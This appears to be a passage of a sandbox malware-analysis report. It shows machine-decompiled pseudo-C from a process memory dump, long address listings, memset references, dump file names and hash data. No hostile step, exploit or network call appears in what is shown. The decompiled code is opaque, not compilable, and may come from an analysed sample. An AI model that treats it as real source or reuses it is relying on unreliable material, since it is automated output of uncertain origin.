														_t1022 =  *(_t1058 - 0x14);
														L192:
														__eflags = _t841 -  *(_t1058 - 0x20);
														if(_t841 >=  *(_t1058 - 0x20)) {
															L250:
															 *_t1022 = 0x10;
															goto L285;
														} else {
															goto L193;
														}
													} else {
														L184:
														__eflags = _t1057 - _t1035;
														if(_t1057 >= _t1035) {
															L196:
															_t1022 =  *(_t1058 - 0x14);
															goto L197;
														} else {
															L185:
															goto L191;
														}
													}
												}
												goto L295;
												L193:
												_t902 = _t1057;
												_t771 = ( *_t841 & 0x000000ff) << _t902;
												_t841 = _t841 + 1;
												_t1006 = _t1006 | _t771;
												 *(_t1058 - 0x18) = _t841;
												_t1057 = _t1057 + 8;
												 *(_t1058 - 4) = _t1006;
												__eflags = _t1057 - 0xf;
											} while (_t1057 < 0xf);
											goto L197;
										}
									}
									goto L295;
								}
								L215:
								_t1007 =  *(_t1022 + 0x2c);
								_t743 =  *(_t1022 + 0x30) + _t1007;
								__eflags = _t743 - _t902;
								if(_t743 != _t902) {
									L269:
									_t684 = _t743 | 0xffffffff;
									 *_t1022 = 0x15;
									goto L291;
								} else {
									L216:
									memcpy(_t1022 + 0x40, _t1022 + 0x2924, _t1007);
									_t749 =  *(_t1022 + 0x2c) + 0x2924 + _t1022;
									__eflags = _t749;
									memcpy(_t1022 + 0xde0, _t749,  *(_t1022 + 0x30));
									_t1061 = _t1061 + 0x18;
									goto L217;
								}
								goto L295;
							}
						}
					} else {
						L149:
						__eflags = _t901 - 1;
						if(_t901 > 1) {
							L267:
							 *(_t1058 - 0xc) = 0xffffffff;
							 *_t1022 = 0x23;
							goto L292;
						} else {
							goto L150;
						}
					}
					goto L295;
				}
			}

0x00115bd5
0x00115bd5
0x00115bd5
0x00115bd5
0x00115bd5
0x00115bd5
0x00115bde
0x00115be4
0x00115be7
0x00115bec
0x00115bec
0x00115bec
0x00115bef
0x00115bf2
0x00000000
0x00000000
0x00115bf4
0x00115bf4
0x00115bf7
0x00115c1a
0x00115c1f
0x00115c22
0x00115c25
0x00115c28
0x00115c2b
0x00115c2e
0x00115c35
0x00115c3f
0x00000000
0x00115bf9
0x00115bf9
0x00115bf9
0x00115bf9
0x00115bfc
0x00000000
0x00000000
0x00115c02
0x00115c07
0x00115c09
0x00115c0a
0x00115c0c
0x00115c0f
0x00115c12
0x00115c15
0x00115c18
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00115c18
0x00116290
0x00116290
0x00116422
0x00116422
0x0011642b
0x00116430
0x00116430
0x00116433
0x00116436
0x00116439
0x0011643b
0x0011643b
0x0011643e
0x00116440
0x0011644d
0x0011644d
0x00116450
0x00116452
0x00116454
0x00116454
0x00116454
0x00116457
0x00000000
0x00000000
0x00116459
0x00116459
0x0011645a
0x0011645d
0x0011645f
0x00000000
0x00000000
0x00000000
0x0011645f
0x00116454
0x00116452
0x0011643e
0x00116439
0x00116461
0x00116461
0x00116464
0x00116466
0x0011646b
0x0011646e
0x00116471
0x00116474
0x00116476
0x00116479
0x00116483
0x0011648e
0x00116491
0x00116495
0x0011649b
0x001164a1
0x001164a7
0x001164aa
0x001164ad
0x001164b2
0x001164b5
0x001164b7
0x001164bd
0x001164bd
0x001164bf
0x001164c5
0x001164c5
0x001164cf
0x001164d5
0x001164de
0x001164e1
0x001164e4
0x001164e6
0x001164ea
0x001164ed
0x001164f3
0x001164f3
0x001164f5
0x001164f5
0x001164f5
0x001164f7
0x001164fa
0x001164fd
0x00116503
0x00116503
0x00116508
0x00116509
0x0011650a
0x0011650b
0x0011650b
0x0011650b
0x00116510
0x00116510
0x00116513
0x00116516
0x00116521
0x0011652c
0x00116537
0x00116542
0x0011654d
0x00116558
0x00116563
0x00116568
0x0011656b
0x0011656d
0x00116572
0x00116574
0x00116574
0x00116579
0x0011657c
0x0011657c
0x0011657f
0x0011657f
0x00116581
0x00116584
0x00116586
0x00116588
0x0011658c
0x0011658f
0x00116591
0x00116591
0x00116596
0x0011659e
0x001165a2
0x001165a2
0x001165a6
0x001165b0
0x001165b0
0x001165b3
0x001165b5
0x001165b9
0x001165bb
0x001165be
0x001165c0
0x001165c2
0x001165c2
0x001165c2
0x001165c5
0x001165c8
0x001165cb
0x001165ce
0x001165d1
0x001165d1
0x001165d4
0x001165d4
0x001165d6
0x001165d8
0x001165de
0x001165e0
0x001165e2
0x001165e2
0x001165e3
0x001165e3
0x001165e6
0x001165e9
0x001165eb
0x001165eb
0x001165eb
0x001165ed
0x001165f2
0x001165fd
0x00116609
0x0011660f
0x00116611
0x00116611
0x00116611
0x00116614
0x00116619
0x0011661c
0x0011661c
0x00116625
0x0011662a
0x0011662a
0x0011662b
0x0011662e
0x00116630
0x00116633
0x00116635
0x00116637
0x0011663b
0x0011663d
0x00116645
0x00116645
0x0011663b
0x00116635
0x001164bf
0x00116648
0x00116650
0x00000000
0x00116650
0x00115c42
0x00115c42
0x00115c49
0x00115c49
0x00115c49
0x00115c4c
0x00115c4e
0x00000000
0x00000000
0x001160ee
0x001160ee
0x001155e8
0x001155e8
0x001155eb
0x001155ed
0x001155f0
0x00000000
0x00000000
0x001155f6
0x001155fc
0x001155ff
0x00115602
0x00000000
0x00115608
0x00115608
0x00115608
0x0011560b
0x0011560d
0x00115611
0x00115613
0x00115616
0x0011561e
0x00115623
0x00115626
0x00115626
0x00115629
0x00115629
0x00115633
0x0011563b
0x0011563e
0x00115640
0x00115649
0x00115649
0x0011564e
0x0011564f
0x00115650
0x00115651
0x00115651
0x00115655
0x00115657
0x0011565b
0x0011565d
0x00115665
0x00115665
0x00115669
0x0011566c
0x00115642
0x00115642
0x00115644
0x00115644
0x0011566f
0x0011566f
0x00115671
0x00115673
0x00115676
0x00115679
0x0011567f
0x0011584a
0x0011584a
0x00115850
0x00115853
0x00115859
0x001160f6
0x001160f6
0x001160fd
0x00116103
0x00116109
0x0011610c
0x0011610f
0x00116111
0x0011614e
0x0011614e
0x00116151
0x00115404
0x0011540b
0x00115413
0x00115418
0x00115426
0x00115426
0x0011542b
0x0011542c
0x0011542d
0x00115430
0x00115430
0x00115434
0x00115436
0x0011543c
0x00115444
0x00115444
0x00115448
0x0011544b
0x0011544e
0x0011541a
0x0011541a
0x0011541c
0x0011541f
0x0011541f
0x00115451
0x00115451
0x00115453
0x00115455
0x0011545c
0x00115463
0x00115466
0x00115469
0x0011546e
0x001154ae
0x001154b1
0x001154b4
0x001154b9
0x001154c5
0x001154c5
0x001154cd
0x001154d5
0x001154d8
0x001154dc
0x001154df
0x001154e1
0x001154e4
0x0011551f
0x0011551f
0x00115522
0x00115586
0x00115586
0x0011558b
0x00115590
0x00115590
0x00115593
0x00115596
0x0011559c
0x0011559f
0x001155a3
0x001155a6
0x001155a9
0x001155ac
0x001155ac
0x00000000
0x00115524
0x00115524
0x00115524
0x00115527
0x00000000
0x00115529
0x00115529
0x00115529
0x0011552e
0x00115534
0x00115536
0x00115539
0x00115540
0x00115540
0x00115542
0x00115544
0x00115547
0x0011554a
0x0011554d
0x00115550
0x00115550
0x00115554
0x00115557
0x0011555d
0x00115560
0x00115563
0x00115566
0x00115569
0x0011556c
0x00000000
0x00000000
0x00000000
0x00000000
0x0011556c
0x00115527
0x00000000
0x001154e6
0x001154e6
0x001154e6
0x001154e6
0x001154e8
0x001154e9
0x001154ee
0x00000000
0x00000000
0x001154f4
0x001154fa
0x001161ff
0x001161ff
0x00116206
0x00000000
0x00115500
0x00115500
0x00115512
0x00115515
0x00115518
0x0011551a
0x00000000
0x0011551a
0x00000000
0x001154fa
0x001155e8
0x001155e8
0x001155eb
0x001155ed
0x001155f0
0x00000000
0x00000000
0x00000000
0x001155f0
0x00000000
0x001155e8
0x001163a4
0x001163a4
0x001163a4
0x001163a7
0x00000000
0x001163a7
0x00115470
0x00115470
0x00115472
0x00115497
0x0011549c
0x001154a1
0x001154a3
0x001154a5
0x001154a8
0x001154ab
0x00000000
0x00115474
0x00000000
0x00115474
0x00115482
0x00115484
0x00115485
0x00115488
0x0011548a
0x0011548d
0x00115490
0x00115495
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00115495
0x0011633c
0x00000000
0x0011633c
0x00115472
0x00116157
0x00116157
0x0011615c
0x0011615f
0x001161d6
0x001161d6
0x001161dd
0x001161e0
0x001161e3
0x001161e8
0x001161ee
0x001161f1
0x001161f4
0x001161f7
0x00000000
0x00116161
0x00116161
0x00116168
0x00116170
0x00116173
0x00116175
0x0011618f
0x0011618f
0x00116192
0x00000000
0x00116198
0x00116198
0x0011619d
0x0011619d
0x001161a0
0x001161a0
0x001161ae
0x001161b9
0x001161ba
0x001161bd
0x001161c0
0x001161c2
0x00000000
0x00000000
0x001161c8
0x001161c8
0x001161c9
0x001161cb
0x00000000
0x001161d1
0x001161d1
0x001161d1
0x00000000
0x001161d1
0x00000000
0x001161cb
0x00000000
0x001161a0
0x00116177
0x00116177
0x00116177
0x0011617a
0x0011617c
0x001153df
0x001153e2
0x00116347
0x00116347
0x00000000
0x00000000
0x00000000
0x00000000
0x00116182
0x00116182
0x00116182
0x00116184
0x00000000
0x0011618a
0x0011618a
0x00000000
0x0011618a
0x00116184
0x0011617c
0x00000000
0x001153e8
0x001153eb
0x001153ed
0x001153ef
0x001153f0
0x001153f2
0x001153f5
0x001153f8
0x001153fb
0x00116161
0x00000000
0x0011615f
0x00116113
0x00116113
0x00116113
0x00116115
0x0011613a
0x0011613f
0x0011613f
0x00116144
0x00116146
0x00116148
0x00116148
0x00116148
0x0011614b
0x00000000
0x00116117
0x00116117
0x00116117
0x00116117
0x0011611a
0x00000000
0x00000000
0x00116120
0x00116125
0x00116127
0x00116128
0x0011612b
0x0011612d
0x00116130
0x00116133
0x00116136
0x00116138
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00116138
0x00116331
0x00116331
0x00000000
0x00116331
0x00116115
0x0011585f
0x0011585f
0x0011585f
0x0011585f
0x00115863
0x00000000
0x00000000
0x00115869
0x00115869
0x0011586c
0x0011588f
0x00115891
0x00115894
0x00115897
0x0011589a
0x0011589d
0x0011589d
0x0011589f
0x001158a2
0x001158a5
0x001158a8
0x00115a6b
0x00115a6b
0x00115a6e
0x00116364
0x00116364
0x0011636b
0x00000000
0x00115a74
0x00115a74
0x00115a74
0x00115a77
0x00115b46
0x00115b46
0x00115b46
0x00115b48
0x00115b48
0x00115b48
0x00115b4b
0x00115b4e
0x00000000
0x00000000
0x00115b54
0x00115b54
0x00115b5b
0x00115b5e
0x00115b60
0x00115b8f
0x00115b8f
0x00115b9a
0x00115ba2
0x00115ba5
0x00115ba8
0x00115baf
0x00115bb1
0x00115bb3
0x00115bb5
0x00115bb8
0x00115bbb
0x00115bc2
0x00115bc5
0x00115bc7
0x00115bca
0x00000000
0x00115b62
0x00115b62
0x00115b62
0x00115b62
0x00115b65
0x00000000
0x00000000
0x00115b6b
0x00115b70
0x00115b72
0x00115b73
0x00115b76
0x00115b78
0x00115b7b
0x00115b7e
0x00115b81
0x00115b88
0x00115b8b
0x00115b8d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00115b8d
0x00116285
0x00116285
0x00000000
0x00116285
0x00000000
0x00115b60
0x00115bd0
0x00000000
0x00115a7d
0x00115a7d
0x00115a7d
0x00115a82
0x00115a83
0x00115a84
0x00115a85
0x00115a86
0x00115a88
0x00115a8a
0x00115a8c
0x00115a8d
0x00115a8f
0x00115a91
0x00115a98
0x00115a9e
0x00115aa6
0x00115aa9
0x00115aae
0x00115ab3
0x00115ab8
0x00115abd
0x00115ac5
0x00115acd
0x00115ad5
0x00115add
0x00115ae5
0x00115aeb
0x00115af3
0x00115af7
0x00115afc
0x00115b01
0x00115b06
0x00115b0b
0x00115b10
0x00115b15
0x00115b1d
0x00115b22
0x00115b2a
0x00115b34
0x00115b3e
0x00000000
0x00115b3e
0x00115a77
0x001158ae
0x001158ae
0x001158b0
0x001158b3
0x001158b5
0x001158dc
0x001158de
0x001158e1
0x001158e3
0x001158e5
0x001158e8
0x001158e8
0x001158ea
0x001158ea
0x001158ea
0x001158ed
0x001158f0
0x00000000
0x00000000
0x001158f2
0x001158f2
0x001158f4
0x00115932
0x00115932
0x00115935
0x0011624f
0x0011624f
0x00000000
0x0011593b
0x0011593b
0x0011593b
0x0011593d
0x0011593e
0x00115945
0x00115946
0x00000000
0x00115946
0x001158f6
0x001158f6
0x001158f6
0x001158f9
0x0011591f
0x0011591f
0x00115926
0x00115929
0x0011592c
0x0011592d
0x00000000
0x001158fb
0x001158fb
0x001158fb
0x001158fb
0x001158fe
0x00000000
0x00000000
0x00115904
0x00115909
0x0011590b
0x0011590c
0x0011590e
0x00115911
0x00115914
0x00115917
0x0011591a
0x00000000
0x0011591c
0x0011591c
0x0011591c
0x00000000
0x0011591c
0x00000000
0x0011591a
0x00116244
0x00116244
0x00000000
0x00116244
0x001158f9
0x00000000
0x001158f4
0x0011594b
0x0011595e
0x00115965
0x0011597a
0x0011597d
0x00116352
0x00116352
0x00116359
0x00000000
0x00115983
0x00115983
0x00115983
0x00115986
0x00115986
0x00115986
0x00115988
0x00000000
0x00000000
0x0011598e
0x0011598e
0x00115990
0x001159ec
0x001159ec
0x001159ef
0x001159ef
0x001159ef
0x001159f1
0x00000000
0x00000000
0x00115a01
0x00115a01
0x00115a04
0x00115a06
0x00115a20
0x00115a20
0x00115a23
0x00115a25
0x00116277
0x00116277
0x0011627a
0x00000000
0x00115a2b
0x00115a2b
0x00115a2b
0x00115a30
0x00115a32
0x00115a36
0x00115a39
0x00115a3b
0x00115a44
0x00115a3d
0x00115a3d
0x00115a3f
0x00115a3f
0x00115a46
0x00115a4b
0x00115a4b
0x00115a54
0x00115a59
0x00115a5b
0x00115a5e
0x00115a61
0x00115a63
0x00115a66
0x00000000
0x00115a66
0x00115a08
0x00115a08
0x00115a08
0x00115a0b
0x00115a12
0x00000000
0x00115a12
0x00000000
0x00115a06
0x001159f3
0x001159f3
0x001159f8
0x00000000
0x00115992
0x00115992
0x00115992
0x00115995
0x001159b8
0x001159b8
0x001159bb
0x001159be
0x001159c1
0x001159c4
0x001159cc
0x001159cf
0x001159d2
0x001159d5
0x00116265
0x00116265
0x0011626c
0x00000000
0x001159db
0x001159db
0x001159de
0x001159e1
0x001159e6
0x001159e7
0x00000000
0x001159e7
0x00115997
0x00115997
0x00115997
0x00115997
0x0011599a
0x00000000
0x00000000
0x001159a0
0x001159a5
0x001159a7
0x001159a8
0x001159aa
0x001159ad
0x001159b0
0x001159b3
0x001159b6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x001159b6
0x0011625a
0x0011625a
0x00000000
0x0011625a
0x00115995
0x00000000
0x00115990
0x00000000
0x00115986
0x001158b7
0x001158b7
0x001158b7
0x001158b7
0x001158ba
0x00000000
0x00000000
0x001158c0
0x001158c5
0x001158c7
0x001158ca
0x001158cc
0x001158cf
0x001158d2
0x001158d5
0x001158d8
0x001158da
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x001158da
0x00116239
0x00116239
0x00000000
0x00116239
0x001158b5
0x0011586e
0x0011586e
0x0011586e
0x0011586e
0x00115871
0x00000000
0x00000000
0x00115877
0x0011587c
0x0011587e
0x0011587f
0x00115881
0x00115884
0x00115887
0x0011588a
0x0011588d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0011588d
0x0011622e
0x0011622e
0x00000000
0x0011622e
0x00000000
0x0011586c
0x001162b1
0x001162b3
0x001162b6
0x001162b8
0x001162e2
0x001162e2
0x001162e7
0x001162ea
0x001162ec
0x001162ee
0x001162f1
0x001162f3
0x001162f5
0x001162f5
0x001162f5
0x001162f8
0x00000000
0x00000000
0x001162fa
0x001162fa
0x001162fb
0x001162fe
0x00116300
0x00000000
0x00000000
0x00000000
0x00116300
0x001162f5
0x00116302
0x00116307
0x00116307
0x0011630b
0x0011630e
0x00116311
0x00116314
0x00116316
0x00116319
0x0011631d
0x00116320
0x00116324
0x00116442
0x00116442
0x00116442
0x00116444
0x0011644a
0x0011644a
0x00000000
0x0011632a
0x0011632a
0x0011632a
0x001163f3
0x001163f3
0x001163f3
0x001163f6
0x001163f9
0x00000000
0x00000000
0x001163fb
0x001163fb
0x001163fd
0x0011640a
0x0011640a
0x0011640d
0x00116410
0x001163d7
0x001163d7
0x001163dd
0x001163dd
0x001163e0
0x00000000
0x00116412
0x00116412
0x001163ba
0x001163ba
0x001163ba
0x001163bd
0x00000000
0x00000000
0x001163bf
0x001163c4
0x001163c6
0x001163c9
0x001163cb
0x001163cc
0x001163cf
0x001163d2
0x00000000
0x001163d4
0x001163d4
0x001163d4
0x00000000
0x001163d4
0x00000000
0x001163d2
0x0011641c
0x0011641c
0x00000000
0x0011641c
0x001163ff
0x001163ff
0x001163ff
0x00116402
0x00116414
0x00116414
0x00000000
0x00116404
0x00116404
0x00116404
0x00116407
0x001163e3
0x001163e3
0x001163ec
0x001163ef
0x001163ef
0x001163f0
0x00000000
0x001163f0
0x00116402
0x00000000
0x001163fd
0x00000000
0x001163f3
0x001162c0
0x00000000
0x001162c0
0x001162c0
0x001162c0
0x001162c3
0x00000000
0x00000000
0x001162c9
0x001162ce
0x001162d0
0x001162d3
0x001162d5
0x001162d8
0x001162db
0x001162de
0x001162e0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x001162e0
0x001163b2
0x001163b2
0x00000000
0x001163b2
0x001162b8
0x00115685
0x00115685
0x00115685
0x00115688
0x0011568a
0x0011568e
0x00115690
0x00115693
0x00115696
0x0011569e
0x001156a3
0x001156a6
0x001156a6
0x001156a9
0x001156a9
0x001156b3
0x001156bb
0x001156be
0x001156c0
0x001156c9
0x001156c9
0x001156ce
0x001156cf
0x001156d0
0x001156d1
0x001156d1
0x001156d5
0x001156d7
0x001156dd
0x001156e5
0x001156e5
0x001156e9
0x001156ec
0x001156c2
0x001156c2
0x001156c4
0x001156c4
0x001156ef
0x001156ef
0x001156f2
0x001156f4
0x001156f9
0x001156fc
0x001156fe
0x00115701
0x00115707
0x00115847
0x00115847
0x00115847
0x00115847
0x00000000
0x0011570d
0x0011570d
0x0011570d
0x00115710
0x00115716
0x00115719
0x001155e8
0x001155e8
0x001155e8
0x001155e8
0x001155eb
0x001155ed
0x001155f0
0x00000000
0x00000000
0x00000000
0x001155f0
0x0011556e
0x0011556e
0x0011556e
0x00115572
0x00115577
0x00115578
0x0011557a
0x0011557c
0x0011557f
0x00115582
0x00115584
0x001155d6
0x001155d6
0x001155db
0x001155df
0x001155e2
0x001155e2
0x001155e5
0x001155e5
0x001155e5
0x001155e5
0x001155e8
0x001155e8
0x001155eb
0x001155ed
0x001155f0
0x00000000
0x00000000
0x00000000
0x001155f0
0x001155b1
0x001155b1
0x001155b4
0x001155b7
0x001155ba
0x001155bd
0x001155c0
0x001155c0
0x001155c4
0x001155c9
0x001155ca
0x001155cc
0x001155ce
0x001155d1
0x001155d4
0x00000000
0x00000000
0x00000000
0x001155d4
0x00115707
0x0011567f
0x00000000
0x0011571e
0x0011571e
0x00115721
0x001157d3
0x001157da
0x001157e2
0x001157e5
0x001157e7
0x001157f8
0x001157f8
0x001157fd
0x001157fe
0x001157ff
0x00115800
0x00115800
0x00115804
0x00115806
0x0011580a
0x0011580c
0x00115814
0x00115814
0x00115818
0x0011581b
0x001157e9
0x001157e9
0x001157eb
0x001157ee
0x001157f3
0x001157f3
0x0011581e
0x0011581e
0x00115820
0x00115822
0x00115825
0x00115828
0x0011582e
0x00000000
0x00115830
0x00115830
0x00115830
0x00115833
0x00115836
0x0011621c
0x0011621c
0x00116223
0x00000000
0x0011583c
0x0011583c
0x0011583c
0x0011583f
0x00000000
0x0011583f
0x00115836
0x00115727
0x00115727
0x00115727
0x0011572a
0x001157af
0x001157af
0x001157b6
0x001157b9
0x001157be
0x001157c4
0x001157c7
0x001157ca
0x001157ca
0x001157cd
0x00000000
0x00115730
0x00115730
0x00115730
0x00115732
0x00115737
0x0011573f
0x00115741
0x00115754
0x00115754
0x00115757
0x00000000
0x00115759
0x00115759
0x0011575e
0x00115761
0x00115761
0x0011576f
0x0011577a
0x0011577b
0x0011577e
0x00115780
0x00000000
0x00000000
0x00115782
0x00115782
0x00115785
0x00115787
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00115787
0x00000000
0x00115761
0x00115743
0x00115743
0x00115743
0x00115746
0x00115748
0x00115789
0x00115789
0x0011578c
0x0011578c
0x0011578f
0x00116211
0x00116211
0x00000000
0x00000000
0x00000000
0x00000000
0x0011574a
0x0011574a
0x0011574a
0x0011574c
0x001157d0
0x001157d0
0x00000000
0x00115752
0x00115752
0x00000000
0x00115752
0x0011574c
0x00115748
0x00000000
0x00115795
0x00115798
0x0011579a
0x0011579c
0x0011579d
0x0011579f
0x001157a2
0x001157a5
0x001157a8
0x001157a8
0x00000000
0x001157ad
0x0011572a
0x00000000
0x00115721
0x001155e8
0x00115c54
0x00115c63
0x00115c6d
0x00115c83
0x00115c99
0x00115ca2
0x00115ca7
0x00115caa
0x00115cad
0x00115cb0
0x00115cb2
0x00115cb4
0x00115cb4
0x00115cc0
0x00115cc0
0x00115cc0
0x00115cc4
0x00115cc5
0x00115ccc
0x00115ccc
0x00115cc0
0x00115cd0
0x00115cd0
0x00115cd5
0x00115cd6
0x00115cd7
0x00115cd8
0x00115cd9
0x00115cd9
0x00115cdf
0x00115ce5
0x00115ce8
0x00115cf0
0x00115cf0
0x00115cf0
0x00115cf9
0x00115cfb
0x00115cfd
0x00115d04
0x00115d07
0x00115d10
0x00115d17
0x00115d19
0x00115d1c
0x00115d25
0x00115d27
0x00115d2e
0x00115d31
0x00115d31
0x00115d3c
0x00115d3f
0x00115d45
0x00115d48
0x00115d4a
0x00115d51
0x00115d5c
0x00115d5c
0x00115d5f
0x00115d66
0x00115d6d
0x00115d70
0x00115d76
0x00115d76
0x00115d80
0x00115d80
0x00115d85
0x00115d85
0x00115d89
0x00115d8c
0x00115d8e
0x00115d94
0x00115d94
0x00115d9b
0x00115d9f
0x00115da6
0x00115da9
0x00115dab
0x00000000
0x00115db0
0x00115db0
0x00115dbb
0x00115dbe
0x00115dbf
0x00115dc1
0x00115dc4
0x00115dc4
0x00115dc8
0x00115dc8
0x00115dcb
0x00115dcb
0x00115dce
0x00115e1d
0x00115e2d
0x00115e30
0x00115e33
0x00115e36
0x00115e39
0x00115e3c
0x00115e3e
0x00115e43
0x00115e46
0x00115e48
0x00115e48
0x00115e4b
0x00115e4e
0x00115e4e
0x00115e51
0x00115e51
0x00115e54
0x00115e57
0x00115e59
0x00115e59
0x00115e59
0x00115e5c
0x00115e5f
0x00115e62
0x00115e62
0x00115e62
0x00115e70
0x00115e75
0x00115e79
0x00115e7c
0x00115e94
0x00115e7e
0x00115e81
0x00115e85
0x00115e88
0x00115e8a
0x00115e8d
0x00115e90
0x00115e90
0x00115e97
0x00115e97
0x00115e97
0x00115e97
0x00115e97
0x00115e9c
0x00115e9f
0x00115e9f
0x00115ea1
0x00115ea6
0x00115ea6
0x00115eab
0x00115dd0
0x00115dd0
0x00115dd7
0x00115dda
0x00115ddd
0x00115de3
0x00115de9
0x00115de9
0x00115dee
0x00115def
0x00115df0
0x00115df1
0x00115df1
0x00115df6
0x00115dff
0x00115dff
0x00115e05
0x00115e05
0x00115e05
0x00115e08
0x00115e0a
0x00115e0d
0x00115e0d
0x00115e15
0x00115e15
0x00115de3
0x00115dce
0x00115eb3
0x00115eb3
0x00115eb6
0x00115eb7
0x00115eb7
0x00115ec1
0x00115ec6
0x00115ec6
0x00115ec7
0x00115ec7
0x00115ecb
0x001160e6
0x001160e6
0x00000000
0x00115ed1
0x00115ed1
0x00115ed1
0x00115ed1
0x00115ed3
0x00115ed3
0x00115ed3
0x00115ed6
0x00115ed6
0x00115edc
0x00115edf
0x00115ee1
0x00000000
0x00000000
0x00115ee7
0x00115ee7
0x00115eea
0x00115fa2
0x00115fa9
0x00115fb1
0x00115fb4
0x00115fb6
0x00115fc7
0x00000000
0x00115fd0
0x00115fd0
0x00115fd0
0x00115fd5
0x00115fd7
0x00115fde
0x00115fe6
0x00115fe9
0x00115fe9
0x00115fb8
0x00115fb8
0x00115fba
0x00115fbd
0x00115fc2
0x00115fc2
0x00115fed
0x00115fed
0x00115fef
0x00115ff1
0x00115ff4
0x00115ff7
0x00115ffa
0x0011600c
0x0011600c
0x0011601c
0x0011601c
0x00116023
0x00116026
0x00116028
0x00116050
0x0011605e
0x00116061
0x00116068
0x0011606b
0x0011606d
0x00116071
0x00116074
0x00116077
0x00116083
0x00116083
0x00116079
0x00116079
0x00116079
0x00116085
0x00116090
0x00116099
0x0011609c
0x0011609e
0x00115ed3
0x00115ed3
0x00000000
0x0011602a
0x0011602a
0x0011602a
0x0011602a
0x0011602d
0x00000000
0x00000000
0x00116033
0x00116038
0x0011603a
0x0011603b
0x0011603e
0x00116040
0x00116043
0x00116046
0x00116049
0x0011604b
0x00000000
0x0011604d
0x0011604d
0x0011604d
0x00000000
0x0011604d
0x00000000
0x0011604b
0x001162a6
0x001162a6
0x00000000
0x001162a6
0x0011600e
0x0011600e
0x0011600e
0x00116011
0x00116013
0x00116388
0x00116388
0x0011638b
0x00000000
0x00116019
0x00116019
0x00116019
0x00000000
0x00116019
0x00116013
0x00115ffc
0x00115ffc
0x00115ffc
0x00115fff
0x00116006
0x00000000
0x00116006
0x00115ef0
0x00115ef0
0x00115ef5
0x00115ef8
0x00115f7e
0x00115f7e
0x00115f85
0x00115f88
0x00115f8d
0x00115f93
0x00115f96
0x00115f99
0x00115f99
0x00115f9c
0x00000000
0x00115efe
0x00115efe
0x00115efe
0x00115f00
0x00115f05
0x00115f0d
0x00115f0f
0x00115f22
0x00115f22
0x00115f25
0x00000000
0x00115f27
0x00115f27
0x00115f2c
0x00115f2c
0x00115f30
0x00115f30
0x00115f3e
0x00115f49
0x00115f4a
0x00115f4d
0x00115f4f
0x00000000
0x00000000
0x00115f51
0x00115f51
0x00115f54
0x00115f56
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00115f56
0x00000000
0x00115f30
0x00115f11
0x00115f11
0x00115f11
0x00115f14
0x00115f16
0x00115f58
0x00115f58
0x00115f5b
0x00115f5b
0x00115f5e
0x0011629b
0x0011629b
0x00000000
0x00000000
0x00000000
0x00000000
0x00115f18
0x00115f18
0x00115f18
0x00115f1a
0x00115f9f
0x00115f9f
0x00000000
0x00115f20
0x00115f20
0x00000000
0x00115f20
0x00115f1a
0x00115f16
0x00000000
0x00115f64
0x00115f67
0x00115f69
0x00115f6b
0x00115f6c
0x00115f6e
0x00115f71
0x00115f74
0x00115f77
0x00115f77
0x00000000
0x00115f7c
0x00115ef8
0x00000000
0x00115eea
0x001160a6
0x001160a9
0x001160ac
0x001160ae
0x001160b0
0x00116396
0x00116396
0x00116399
0x00000000
0x001160b6
0x001160b6
0x001160c2
0x001160d3
0x001160d3
0x001160dd
0x001160e3
0x00000000
0x001160e3
0x00000000
0x001160b0
0x00115ed3
0x00115d53
0x00115d53
0x00115d53
0x00115d56
0x00116376
0x00116376
0x0011637d
0x00000000
0x00000000
0x00000000
0x00000000
0x00115d56
0x00000000
0x00115d51

APIs

memset.NTDLL ref: 00115BDE
memset.NTDLL ref: 00115C6D
memset.NTDLL ref: 00115C83
memset.NTDLL ref: 00115C99

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 605ae726788d694d9008c25480e32f20af22b90ea040fd050d9413ff98c7c54c
Instruction ID: 7d389574dbe89eac6fdfd9eff5bfc942e7ab25cf4693010b515ad74d0667939b
Opcode Fuzzy Hash: 605ae726788d694d9008c25480e32f20af22b90ea040fd050d9413ff98c7c54c
Instruction Fuzzy Hash: 1E31AFB5E04615EBDB08CFA4C891BEDBBB6BF88314F144069E502A7680D374A6D1CB94

Uniqueness

Uniqueness Score: 0.00%

Function 00115A85, Relevance: 5.1, APIs: 4, Instructions: 79
COMMON

C-Code - Quality: 68%

			E00115A85(void* __eax, void* __ebx, void* __edi) {
				intOrPtr* _t597;
				void* _t598;
				signed int _t600;
				signed int _t603;
				signed int _t605;
				void* _t608;
				signed int _t609;
				signed int _t612;
				signed int _t614;
				signed int _t617;
				signed int _t618;
				signed int _t624;
				signed int _t625;
				void* _t628;
				signed int _t630;
				void* _t631;
				signed int _t641;
				signed int* _t651;
				signed int _t654;
				signed int _t671;
				signed int _t673;
				signed int _t675;
				signed int _t685;
				signed int _t688;
				signed int _t689;
				signed int _t690;
				signed int _t695;
				unsigned int _t698;
				void* _t699;
				signed int _t707;
				signed int _t710;
				signed int _t721;
				signed int _t725;
				signed int _t727;
				void* _t730;
				signed int _t732;
				signed int _t733;
				intOrPtr _t734;
				signed char _t738;
				intOrPtr* _t740;
				void* _t741;
				signed int _t749;
				signed int _t753;
				signed int _t758;
				signed int _t764;
				signed int _t767;
				void* _t769;
				intOrPtr _t782;
				intOrPtr _t783;
				intOrPtr _t784;
				signed int _t787;
				signed int _t791;
				void* _t797;
				signed int _t802;
				signed int _t804;
				signed int _t808;
				signed int _t812;
				signed int _t815;
				signed int _t819;
				void* _t824;
				signed int _t828;
				void* _t829;
				signed int _t834;
				void* _t835;
				void* _t836;
				signed int _t841;
				signed int _t842;
				signed char _t844;
				signed int _t845;
				void* _t847;
				void* _t851;
				signed int _t853;
				intOrPtr _t854;
				signed char _t860;
				signed int _t861;
